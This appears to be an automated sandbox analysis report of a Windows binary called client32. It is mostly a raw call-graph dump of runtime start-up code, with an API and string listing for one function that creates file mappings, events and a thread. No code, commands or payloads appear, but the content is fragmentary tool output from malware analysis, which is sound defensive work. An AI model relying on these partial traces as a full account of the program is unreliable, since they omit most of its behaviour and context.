69d058f8 94756->94753 94823 69d05c32 EncodePointer __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 94756->94823 94757 69d05918 94757->94748 94759->94734 94760->94716 94762 69d07144 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 94761->94762 94763 69d0713b 94761->94763 94765 69d0718e TlsAlloc 94762->94765 94831 69d06dfa 28 API calls _free 94763->94831 94768 69d071dc TlsSetValue 94765->94768 94769 69d0729d 94765->94769 94766 69d07140 94766->94727 94768->94769 94770 69d071ed 94768->94770 94769->94727 94832 69d05b5e __initp_misc_winsig RtlEncodePointer EncodePointer __init_pointers FindHandlerForForeignException 94770->94832 94772 69d071f2 EncodePointer EncodePointer EncodePointer EncodePointer 94773 69d07231 94772->94773 94774 69d07235 DecodePointer 94773->94774 94775 69d07298 94773->94775 94777 69d0724a 94774->94777 94834 69d06dfa 28 API calls _free 94775->94834 94777->94775 94778 69d0d3f5 __calloc_crt 24 API calls 94777->94778 94779 69d07260 94778->94779 94779->94775 94780 69d07268 DecodePointer 94779->94780 94781 69d07279 94780->94781 94781->94775 94782 69d0727d 94781->94782 94833 69d06e37 13 API calls 2 library calls 94782->94833 94784 69d07285 GetCurrentThreadId 94784->94769 94786 69d0f032 WideCharToMultiByte 94785->94786 94787 69d058d5 94785->94787 94789 69d0f067 94786->94789 94790 69d0f09f FreeEnvironmentStringsW 94786->94790 94819 69d098c4 31 API calls __calloc_crt 94787->94819 94835 69d0d3b0 59 API calls _malloc 94789->94835 94790->94787 94792 69d0f06d 94792->94790 94793 69d0f075 WideCharToMultiByte 94792->94793 94794 69d0f093 FreeEnvironmentStringsW 94793->94794 94795 69d0f087 94793->94795 94794->94787 94796 69d01bfd _free 24 API calls 94795->94796 94797 69d0f08f 94796->94797 94797->94794 94799 69d05985 94798->94799 94800 69d06dbe DecodePointer TlsSetValue 94798->94800 94801 69d0d3f5 94799->94801 94800->94799 94802 69d0d3fe 94801->94802 94804 69d05991 94802->94804 94805 69d0d41c Sleep 94802->94805 94836 69d0a082 94802->94836 94804->94733 94804->94734 94806 69d0d431 94805->94806 94806->94802 94806->94804 94808 69d07106 94807->94808 94809 69d070bb 94807->94809 94810 69d07110 TlsSetValue 94808->94810 94811 69d07119 94808->94811 94812 69d070c1 TlsGetValue 94809->94812 94813 69d070e8 RtlDecodePointer 94809->94813 94810->94811 94811->94734 94814 69d070d4 TlsGetValue 94812->94814 94815 69d070e4 94812->94815 94816 69d070fe 94813->94816 94814->94815 94815->94813 94845 69d06f7e 35 API calls 4 library calls 94816->94845 94818->94734 94819->94747 94820->94728 94821->94752 94822->94756 94823->94753 94824->94757 94825->94718 94826->94729 94827->94735 94828->94719 94829->94734 94830->94746 94831->94766 94832->94772 94833->94784 94834->94769 94835->94792 94837 69d0a08e 94836->94837 94842 69d0a0a9 94836->94842 94838 69d0a09a 94837->94838 94837->94842 94844 69d060f9 24 API calls __getptd_noexit 94838->94844 94840 69d0a0bc RtlAllocateHeap 94840->94842 94843 69d0a0e3 94840->94843 94841 69d0a09f 94841->94802 94842->94840 94842->94843 94843->94802 94844->94841 94845->94808 94846 11089cf0 94847 111103d0 ___DllMainCRTStartup 4 API calls 94846->94847 94849 11089d03 94847->94849 94848 11089d0d 94851 11089d34 94848->94851 94859 11089430 268 API calls std::locale::facet::_Facet_Register 94848->94859 94849->94848 94858 11089430 268 API calls std::locale::facet::_Facet_Register 94849->94858 94854 11089d43 94851->94854 94855 11089cc0 94851->94855 94860 11089950 94855->94860 94858->94848 94859->94851 94901 11088c40 6 API calls ___DllMainCRTStartup 94860->94901 94862 11089989 GetParent 94863 1108999c 94862->94863 94864 110899ad 94862->94864 94865 110899a0 GetParent 94863->94865 94866 11145990 267 API calls 94864->94866 94865->94864 94865->94865 94867 110899b9 94866->94867 94868 11164ead std::locale::facet::_Facet_Register 143 API calls 94867->94868 94869 110899c6 std::ios_base::_Ios_base_dtor 94868->94869 94870 11145990 267 API calls 94869->94870 94871 110899df 94870->94871 94902 11013dd0 22 API calls 2 library calls 94871->94902 94873 110899fa 94873->94873 94874 11143e00 std::locale::facet::_Facet_Register 8 API calls 94873->94874 94877 11089a3a std::ios_base::_Ios_base_dtor 94874->94877 94875 11089a55 94876 11164c77 std::locale::facet::_Facet_Register 102 API calls 94875->94876 94879 11089a73 std::locale::facet::_Facet_Register 94875->94879 94876->94879 94877->94875 94878 11142e60 std::locale::facet::_Facet_Register 265 API calls 94877->94878 94878->94875 94881 1102ad70 std::locale::facet::_Facet_Register 145 API calls 94879->94881 94892 11089b24 std::ios_base::_Ios_base_dtor 94879->94892 94880 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94882 11089c12 94880->94882 94883 11089ac3 94881->94883 94882->94854 94884 11142e60 std::locale::facet::_Facet_Register 265 API calls 94883->94884 94885 11089acb 94884->94885 94886 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 94885->94886 94887 11089ae2 94886->94887 94888 11081e70 86 API calls 94887->94888 94887->94892 94889 11089afa 94888->94889 94890 11089b3e 94889->94890 94891 11089b01 94889->94891 94894 11081e70 86 API calls 94890->94894 94903 110b7aa0 94891->94903 94892->94880 94896 11089b49 94894->94896 94896->94892 94898 110b7aa0 68 API calls 94896->94898 94897 110b7aa0 68 API calls 94897->94892 94899 11089b56 94898->94899 94899->94892 94900 110b7aa0 68 API calls 94899->94900 94900->94892 94901->94862 94902->94873 94906 110b7a80 94903->94906 94909 111681a3 94906->94909 94912 11168124 94909->94912 94913 11168131 94912->94913 94914 1116814b 94912->94914 94930 1116a1c2 66 API calls __getptd_noexit 94913->94930 94914->94913 94916 11168154 GetFileAttributesA 94914->94916 94918 11168162 GetLastError 94916->94918 94924 11168178 94916->94924 94917 11168136 94931 1116a1af 66 API calls __getptd_noexit 94917->94931 94933 1116a1d5 66 API calls 3 library calls 94918->94933 94921 11089b07 94921->94892 94921->94897 94922 1116813d 94932 1116edc4 11 API calls __mbsupr_s_l 94922->94932 94923 1116816e 94934 1116a1af 66 API calls __getptd_noexit 94923->94934 94924->94921 94935 1116a1c2 66 API calls __getptd_noexit 94924->94935 94928 1116818b 94936 1116a1af 66 API calls __getptd_noexit 94928->94936 94930->94917 94931->94922 94932->94921 94933->94923 94934->94921 94935->94928 94936->94923 94937 1116a5cd 94938 1116a5dd 94937->94938 94939 1116a5d8 94937->94939 94943 1116a4d7 94938->94943 94955 11177f37 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 94939->94955 94942 1116a5eb 94944 1116a4e3 __freefls@4 94943->94944 94945 1116a530 94944->94945 94953 1116a580 __freefls@4 94944->94953 94956 1116a373 94944->94956 94945->94953 95005 11026410 94945->95005 94948 1116a543 94949 1116a560 94948->94949 94950 11026410 ___DllMainCRTStartup 7 API calls 94948->94950 94951 1116a373 __CRT_INIT@12 150 API calls 94949->94951 94949->94953 94952 1116a557 94950->94952 94951->94953 94954 1116a373 __CRT_INIT@12 150 API calls 94952->94954 94953->94942 94954->94949 94955->94938 94957 1116a37f __freefls@4 94956->94957 94958 1116a387 94957->94958 94959 1116a401 94957->94959 95014 1116e390 HeapCreate 94958->95014 94961 1116a407 94959->94961 94962 1116a462 94959->94962 94967 1116a425 94961->94967 94975 1116a390 __freefls@4 94961->94975 95102 1116e65b 66 API calls _doexit 94961->95102 94963 1116a467 94962->94963 94964 1116a4c0 94962->94964 94966 1116c4ba ___set_flsgetvalue 3 API calls 94963->94966 94964->94975 95108 1116c7be 79 API calls __freefls@4 94964->95108 94965 1116a38c 94965->94975 95015 1116c82c GetModuleHandleW 94965->95015 94969 1116a46c 94966->94969 94972 1116a439 94967->94972 95103 1117226e 67 API calls _free 94967->95103 94974 1116ac7e __calloc_crt 66 API calls 94969->94974 95106 1116a44c 70 API calls __mtterm 94972->95106 94978 1116a478 94974->94978 94975->94945 94976 1116a39c __RTC_Initialize 94983 1116a3ac GetCommandLineA 94976->94983 94997 1116a3a0 94976->94997 94978->94975 94980 1116a484 DecodePointer FlsSetValue 94978->94980 94979 1116a42f 95104 1116c50b 70 API calls _free 94979->95104 94984 1116a4b4 94980->94984 94985 1116a49d 94980->94985 95040 11177e54 GetEnvironmentStringsW 94983->95040 94990 11163aa5 _free 66 API calls 94984->94990 95107 1116c548 66 API calls 4 library calls 94985->95107 94986 1116a434 95105 1116e3ae HeapDestroy 94986->95105 94990->94975 94992 1116a4a4 GetCurrentThreadId 94992->94975 95099 1116e3ae HeapDestroy 94997->95099 94999 1116a3ea 94999->94975 95101 1117226e 67 API calls _free 94999->95101 95002 1116a3ca 95100 1116c50b 70 API calls _free 95002->95100 95006 111104e0 95005->95006 95007 11110501 95006->95007 95008 111104ec 95006->95008 95009 11110514 ___DllMainCRTStartup 95006->95009 95163 11110430 95007->95163 95008->95009 95012 11110430 ___DllMainCRTStartup 7 API calls 95008->95012 95009->94948 95011 11110508 95011->94948 95013 111104f5 95012->95013 95013->94948 95014->94965 95016 1116c840 95015->95016 95017 1116c849 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 95015->95017 95109 1116c50b 70 API calls _free 95016->95109 95019 1116c893 TlsAlloc 95017->95019 95022 1116c9a2 95019->95022 95023 1116c8e1 TlsSetValue 95019->95023 95020 1116c845 95020->94976 95022->94976 95023->95022 95024 1116c8f2 95023->95024 95110 1116e417 RtlEncodePointer EncodePointer __init_pointers _doexit __initp_misc_winsig 95024->95110 95026 1116c8f7 EncodePointer EncodePointer EncodePointer EncodePointer 95111 11174425 InitializeCriticalSectionAndSpinCount 95026->95111 95028 1116c936 95029 1116c99d 95028->95029 95030 1116c93a DecodePointer 95028->95030 95113 1116c50b 70 API calls _free 95029->95113 95032 1116c94f 95030->95032 95032->95029 95033 1116ac7e __calloc_crt 66 API calls 95032->95033 95034 1116c965 95033->95034 95034->95029 95035 1116c96d DecodePointer 95034->95035 95036 1116c97e 95035->95036 95036->95029 95037 1116c982 95036->95037 95112 1116c548 66 API calls 4 library calls 95037->95112 95039 1116c98a GetCurrentThreadId 95039->95022 95041 11177e70 WideCharToMultiByte 95040->95041 95042 1116a3bc 95040->95042 95044 11177ea5 95041->95044 95045 11177edd FreeEnvironmentStringsW 95041->95045 95053 11172029 GetStartupInfoW 95042->95053 95046 1116ac39 __malloc_crt 66 API calls 95044->95046 95045->95042 95047 11177eab 95046->95047 95047->95045 95048 11177eb3 WideCharToMultiByte 95047->95048 95049 11177ec5 95048->95049 95050 11177ed1 FreeEnvironmentStringsW 95048->95050 95051 11163aa5 _free 66 API calls 95049->95051 95050->95042 95052 11177ecd 95051->95052 95052->95050 95054 1116ac7e __calloc_crt 66 API calls 95053->95054 95060 11172047 95054->95060 95055 111721f2 GetStdHandle 95061 111721bc 95055->95061 95056 1116ac7e __calloc_crt 66 API calls 95056->95060 95057 11172256 SetHandleCount 95065 1116a3c6 95057->95065 95058 11172204 GetFileType 95058->95061 95059 1117213c 95059->95061 95062 11172173 InitializeCriticalSectionAndSpinCount 95059->95062 95063 11172168 GetFileType 95059->95063 95060->95056 95060->95059 95060->95061 95060->95065 95061->95055 95061->95057 95061->95058 95064 1117222a InitializeCriticalSectionAndSpinCount 95061->95064 95062->95059 95062->95065 95063->95059 95063->95062 95064->95061 95064->95065 95065->95002 95066 11177d99 95065->95066 95067 11177db3 GetModuleFileNameA 95066->95067 95068 11177dae 95066->95068 95070 11177dda 95067->95070 95120 11171a45 94 API calls __setmbcp 95068->95120 95114 11177bff 95070->95114 95072 1116a3d6 95072->94999 95077 11177b23 95072->95077 95074 1116ac39 __malloc_crt 66 API calls 95075 11177e1c 95074->95075 95075->95072 95076 11177bff _parse_cmdline 76 API calls 95075->95076 95076->95072 95078 11177b2c 95077->95078 95082 11177b31 _strlen 95077->95082 95122 11171a45 94 API calls __setmbcp 95078->95122 95080 1116a3df 95080->94999 95093 1116e46e 95080->95093 95081 1116ac7e __calloc_crt 66 API calls 95086 11177b66 _strlen 95081->95086 95082->95080 95082->95081 95083 11177bb5 95084 11163aa5 _free 66 API calls 95083->95084 95084->95080 95085 1116ac7e __calloc_crt 66 API calls 95085->95086 95086->95080 95086->95083 95086->95085 95087 11177bdb 95086->95087 95089 1116cd5f _strcpy_s 66 API calls 95086->95089 95090 11177bf2 95086->95090 95088 11163aa5 _free 66 API calls 95087->95088 95088->95080 95089->95086 95091 1116ed72 __invoke_watson 10 API calls 95090->95091 95092 11177bfe 95091->95092 95094 1116e47c __IsNonwritableInCurrentImage 95093->95094 95123 1116d88b 95094->95123 95096 1116e49a __initterm_e 95098 1116e4bb __IsNonwritableInCurrentImage 95096->95098 95126 11163dd5 95096->95126 95098->94999 95099->94975 95100->94997 95101->95002 95102->94967 95103->94979 95104->94986 95105->94972 95106->94975 95107->94992 95108->94975 95109->95020 95110->95026 95111->95028 95112->95039 95113->95022 95116 11177c1e 95114->95116 95118 11177c8b 95116->95118 95121 11177590 76 API calls x_ismbbtype_l 95116->95121 95117 11177d89 95117->95072 95117->95074 95118->95117 95119 11177590 76 API calls __splitpath_helper 95118->95119 95119->95118 95120->95067 95121->95116 95122->95082 95124 1116d891 EncodePointer 95123->95124 95124->95124 95125 1116d8ab 95124->95125 95125->95096 95129 11163d99 95126->95129 95128 11163de2 95128->95098 95130 11163da5 __freefls@4 95129->95130 95137 1116e405 95130->95137 95136 11163dc6 __freefls@4 95136->95128 95138 1117459f __lock 66 API calls 95137->95138 95139 11163daa 95138->95139 95140 11163cb2 RtlDecodePointer DecodePointer 95139->95140 95141 11163ce0 95140->95141 95142 11163d61 95140->95142 95141->95142 95156 1116fe8f 67 API calls __mbsupr_s_l 95141->95156 95153 11163dcf 95142->95153 95144 11163cf2 95145 11163d44 EncodePointer EncodePointer 95144->95145 95146 11163d1c 95144->95146 95147 11163d0d 95144->95147 95145->95142 95146->95142 95149 11163d16 95146->95149 95157 1116acca 70 API calls __recalloc 95147->95157 95149->95146 95152 11163d32 EncodePointer 95149->95152 95158 1116acca 70 API calls __recalloc 95149->95158 95151 11163d2c 95151->95142 95151->95152 95152->95145 95159 1116e40e 95153->95159 95156->95144 95157->95149 95158->95151 95162 111744c6 LeaveCriticalSection 95159->95162 95161 11163dd4 95161->95136 95162->95161 95164 11110474 EnterCriticalSection 95163->95164 95165 1111045f InitializeCriticalSection 95163->95165 95166 11110495 95164->95166 95165->95164 95167 111104c3 LeaveCriticalSection 95166->95167 95168 111103d0 ___DllMainCRTStartup 4 API calls 95166->95168 95167->95011 95168->95166 95169 11030b78 95170 11143630 267 API calls 95169->95170 95171 11030b86 95170->95171 95172 11143780 86 API calls 95171->95172 95173 11030bc3 95172->95173 95174 11030bd8 95173->95174 95175 11081e70 86 API calls 95173->95175 95176 110ed520 8 API calls 95174->95176 95175->95174 95177 11030bff 95176->95177 95179 11030c49 95177->95179 95227 110ed5d0 81 API calls 2 library calls 95177->95227 95181 11143780 86 API calls 95179->95181 95180 11030c14 95228 110ed5d0 81 API calls 2 library calls 95180->95228 95183 11030c60 95181->95183 95186 111101b0 std::locale::facet::_Facet_Register 265 API calls 95183->95186 95184 11030c2b 95184->95179 95185 11146fe0 19 API calls 95184->95185 95185->95179 95187 11030c6f 95186->95187 95188 11030c90 95187->95188 95189 11088b30 268 API calls 95187->95189 95190 1108a880 267 API calls 95188->95190 95189->95188 95191 11030ca3 OpenMutexA 95190->95191 95192 11030cc3 CreateMutexA 95191->95192 95193 11030dda CloseHandle 95191->95193 95194 11030ce3 95192->95194 95220 1108a980 95193->95220 95196 111101b0 std::locale::facet::_Facet_Register 265 API calls 95194->95196 95197 11030cf8 95196->95197 95199 11030d1b 95197->95199 95200 11061710 293 API calls 95197->95200 95198 11030df0 95201 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 95198->95201 95229 110161e0 LoadLibraryA 95199->95229 95200->95199 95203 11031773 95201->95203 95204 11030d2d 95205 11145c70 std::locale::facet::_Facet_Register 90 API calls 95204->95205 95206 11030d3c 95205->95206 95207 11030d49 95206->95207 95208 11030d5c 95206->95208 95230 111466b0 93 API calls std::locale::facet::_Facet_Register 95207->95230 95210 11030d66 GetProcAddress 95208->95210 95211 11030d50 95208->95211 95210->95211 95212 11030d80 SetLastError 95210->95212 95213 110287a0 47 API calls 95211->95213 95212->95211 95214 11030d8d 95213->95214 95231 11009370 432 API calls std::locale::facet::_Facet_Register 95214->95231 95216 11030d9c 95217 11030db0 WaitForSingleObject 95216->95217 95217->95217 95218 11030dc2 CloseHandle 95217->95218 95218->95193 95219 11030dd3 FreeLibrary 95218->95219 95219->95193 95221 1108aa27 95220->95221 95224 1108a9ba std::ios_base::_Ios_base_dtor 95220->95224 95222 1108aa2e DeleteCriticalSection 95221->95222 95232 1115c2d0 95222->95232 95223 1108a9ce CloseHandle 95223->95224 95224->95221 95224->95223 95226 1108aa54 std::ios_base::_Ios_base_dtor 95226->95198 95227->95180 95228->95184 95229->95204 95230->95211 95231->95216 95235 1115c2e4 95232->95235 95233 1115c2e8 95233->95226 95235->95233 95235->95235 95236 1115c040 67 API calls 2 library calls 95235->95236 95236->95235 95237 1116c488 RtlEncodePointer

                                                                                                Executed Functions

                                                                                                Function 1109E5B0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 774 1109e5b0-1109e612 call 1109dda0 777 1109e618-1109e63b call 1109d860 774->777 778 1109ec30 774->778 783 1109e641-1109e655 LocalAlloc 777->783 784 1109e7a4-1109e7a6 777->784 780 1109ec32-1109ec4d call 11162bb7 778->780 786 1109e65b-1109e68d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 783->786 787 1109ec25-1109ec2b call 1109d8f0 783->787 788 1109e736-1109e75b CreateFileMappingA 784->788 791 1109e71a-1109e730 786->791 792 1109e693-1109e6be call 1109d7d0 call 1109d810 786->792 787->778 789 1109e7a8-1109e7bb GetLastError 788->789 790 1109e75d-1109e77d GetLastError call 110d6c20 788->790 796 1109e7bd 789->796 797 1109e7c2-1109e7d9 MapViewOfFile 789->797 802 1109e788-1109e790 790->802 803 1109e77f-1109e786 LocalFree 790->803 791->788 822 1109e709-1109e711 792->822 823 1109e6c0-1109e6f6 GetSecurityDescriptorSacl 792->823 796->797 800 1109e7db-1109e7f6 call 110d6c20 797->800 801 1109e817-1109e81f 797->801 816 1109e7f8-1109e7f9 LocalFree 800->816 817 1109e7fb-1109e803 800->817 804 1109e8c1-1109e8d3 801->804 805 1109e825-1109e83e GetModuleFileNameA 801->805 812 1109e792-1109e793 LocalFree 802->812 813 1109e795-1109e79f 802->813 803->802 808 1109e919-1109e932 call 11162be0 GetTickCount 804->808 809 1109e8d5-1109e8d8 804->809 810 1109e8dd-1109e8f8 call 110d6c20 805->810 811 1109e844-1109e84d 805->811 835 1109e934-1109e939 808->835 818 1109e9bf-1109ea23 GetCurrentProcessId GetModuleFileNameA call 1109dc30 809->818 839 1109e8fa-1109e8fb LocalFree 810->839 840 1109e8fd-1109e905 810->840 811->810 819 1109e853-1109e856 811->819 812->813 821 1109ec1e-1109ec20 call 1109dce0 813->821 816->817 826 1109e808-1109e812 817->826 827 1109e805-1109e806 LocalFree 817->827 844 1109ea2b-1109ea42 CreateEventA 818->844 845 1109ea25 818->845 829 1109e899-1109e8bc call 110d6c20 call 1109dce0 819->829 830 1109e858-1109e85c 819->830 821->787 822->791 834 1109e713-1109e714 FreeLibrary 822->834 823->822 833 1109e6f8-1109e703 SetSecurityDescriptorSacl 823->833 826->821 827->826 829->804 830->829 838 1109e85e-1109e869 830->838 833->822 834->791 841 1109e93b-1109e94a 835->841 842 1109e94c 835->842 846 1109e870-1109e874 838->846 839->840 847 1109e90a-1109e914 840->847 848 1109e907-1109e908 LocalFree 840->848 841->835 841->842 849 1109e94e-1109e954 842->849 853 1109ea44-1109ea63 GetLastError * 2 call 110d6c20 844->853 854 1109ea66-1109ea6e 844->854 845->844 851 1109e890-1109e892 846->851 852 1109e876-1109e878 846->852 847->821 848->847 858 1109e965-1109e9bd 849->858 859 1109e956-1109e963 849->859 855 1109e895-1109e897 851->855 860 1109e87a-1109e880 852->860 861 1109e88c-1109e88e 852->861 853->854 856 1109ea70 854->856 857 1109ea76-1109ea87 CreateEventA 854->857 855->810 855->829 856->857 863 1109ea89-1109eaa8 GetLastError * 2 call 110d6c20 857->863 864 1109eaab-1109eab3 857->864 858->818 859->849 859->858 860->851 865 1109e882-1109e88a 860->865 861->855 863->864 868 1109eabb-1109eacd CreateEventA 864->868 869 1109eab5 864->869 865->846 865->861 871 1109eacf-1109eaee GetLastError * 2 call 110d6c20 868->871 872 1109eaf1-1109eaf9 868->872 869->868 871->872 874 1109eafb 872->874 875 1109eb01-1109eb12 CreateEventA 872->875 874->875 877 1109eb34-1109eb42 875->877 878 1109eb14-1109eb31 GetLastError * 2 call 110d6c20 875->878 879 1109eb44-1109eb45 LocalFree 877->879 880 1109eb47-1109eb4f 877->880 878->877 879->880 883 1109eb51-1109eb52 LocalFree 880->883 884 1109eb54-1109eb5d 880->884 883->884 885 1109eb63-1109eb66 884->885 886 1109ec07-1109ec19 call 110d6c20 884->886 885->886 888 1109eb6c-1109eb6f 885->888 886->821 888->886 890 1109eb75-1109eb78 888->890 890->886 891 1109eb7e-1109eb81 890->891 892 1109eb8c-1109eba8 CreateThread 891->892 893 1109eb83-1109eb89 GetCurrentThreadId 891->893 894 1109ebaa-1109ebb4 892->894 895 1109ebb6-1109ebc0 892->895 893->892 894->821 896 1109ebda-1109ec05 SetEvent call 110d6c20 call 1109d8f0 895->896 897 1109ebc2-1109ebd8 ResetEvent * 3 895->897 896->780 897->896
                                                                                                APIs
                                                                                                  • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,986DAFD2,00080000,00000000,?), ref: 1109D88D
                                                                                                  • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                                  • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                                  • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                                • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,986DAFD2,00080000,00000000,?), ref: 1109E645
                                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
                                                                                                • GetVersionExA.KERNEL32(?), ref: 1109E680
                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
                                                                                                • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
                                                                                                • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
                                                                                                • CreateFileMappingA.KERNEL32 ref: 1109E750
                                                                                                • GetLastError.KERNEL32 ref: 1109E75D
                                                                                                • LocalFree.KERNEL32(?), ref: 1109E786
                                                                                                • LocalFree.KERNEL32(?), ref: 1109E793
                                                                                                • GetLastError.KERNEL32 ref: 1109E7B0
                                                                                                • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                                                • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                                                • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                                  • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 1109D7D8
                                                                                                  • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA,00000000,?,1109E6BC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D824
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                                                • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                                                • LocalFree.KERNEL32(?), ref: 1109E908
                                                                                                • _memset.LIBCMT ref: 1109E920
                                                                                                • GetTickCount.KERNEL32 ref: 1109E928
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                                                • GetLastError.KERNEL32 ref: 1109EA44
                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                                                • GetLastError.KERNEL32 ref: 1109EA89
                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                                                • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                                                • GetLastError.KERNEL32 ref: 1109EACF
                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                                                • GetLastError.KERNEL32 ref: 1109EB1A
                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                                                • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                                                • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                                                • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                                                • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                                                • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                • API String ID: 3291243470-2792520954
                                                                                                • Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                                • Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
                                                                                                • Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                                • Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50
                                                                                                Function 11029BB0 Relevance: 93.3, APIs: 41, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
